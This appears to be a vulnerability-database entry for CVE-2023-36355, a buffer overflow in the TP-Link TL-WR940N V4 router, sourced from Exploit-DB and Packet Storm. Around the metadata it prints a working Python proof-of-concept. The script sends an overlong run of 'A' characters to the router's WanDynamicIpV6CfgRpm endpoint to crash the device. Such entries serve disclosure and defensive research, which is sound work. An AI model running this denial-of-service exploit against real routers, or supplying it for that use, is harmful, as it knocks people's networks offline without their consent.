Sign-up

ID

VAR-E-202307-0292


CVE

cve_id:CVE-2023-36355

Trust: 1.5

sources: PACKETSTORM: 173294 // EXPLOIT-DB: 51561

EDB ID

51561


TITLE

TP-Link TL-WR940N V4 - Buffer OverFlow - Hardware dos Exploit

Trust: 1.0

sources: EXPLOIT-DB: 51561

DESCRIPTION

TP-Link TL-WR940N V4 - Buffer OverFlow. CVE-2023-36355 . dos exploit for Hardware platform

Trust: 1.0

sources: EXPLOIT-DB: 51561

AFFECTED PRODUCTS

vendor:tp linkmodel:tl-wr940nscope:eqversion:v4

Trust: 1.0

vendor:tp linkmodel:tl-wr940nscope:eqversion:4

Trust: 0.5

sources: PACKETSTORM: 173294 // EXPLOIT-DB: 51561

EXPLOIT

# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : hardware
# Dork : /userRpm/WanDynamicIpV6CfgRpm
# Tested on: Windows/Linux
# CVE : CVE-2023-36355

import requests

# Replace the IP address with the router's IP
router_ip = '192.168.0.1'

# Construct the URL with the vulnerable endpoint and parameter
url = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='

# Replace the payload with a crafted payload that triggers the buffer overflow
payload = 'A' * 5000 # Example payload, adjust the length as needed

# Send the GET request with the crafted payload
response = requests.get(url + payload)

# Check the response status code
if response.status_code == 200:
print('Buffer overflow triggered successfully')
else:
print('Buffer overflow not triggered')

Trust: 1.0

sources: EXPLOIT-DB: 51561

EXPLOIT LANGUAGE

py

Trust: 1.0

sources: EXPLOIT-DB: 51561

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 51561

TYPE

Buffer OverFlow

Trust: 1.0

sources: EXPLOIT-DB: 51561

TAGS

tag:exploit

Trust: 0.5

tag:overflow

Trust: 0.5

sources: PACKETSTORM: 173294

CREDITS

Amirhossein Bahramizadeh

Trust: 1.0

sources: EXPLOIT-DB: 51561

EXTERNAL IDS

db:NVDid:CVE-2023-36355

Trust: 1.5

db:EXPLOIT-DBid:51561

Trust: 1.0

db:PACKETSTORMid:173294

Trust: 0.5

sources: PACKETSTORM: 173294 // EXPLOIT-DB: 51561

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2023-36355

Trust: 1.5

sources: PACKETSTORM: 173294 // EXPLOIT-DB: 51561

SOURCES

db:PACKETSTORMid:173294
db:EXPLOIT-DBid:51561

LAST UPDATE DATE

2023-12-13T13:18:36.333000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:173294date:2023-07-03T22:22:22
db:EXPLOIT-DBid:51561date:2023-07-03T00:00:00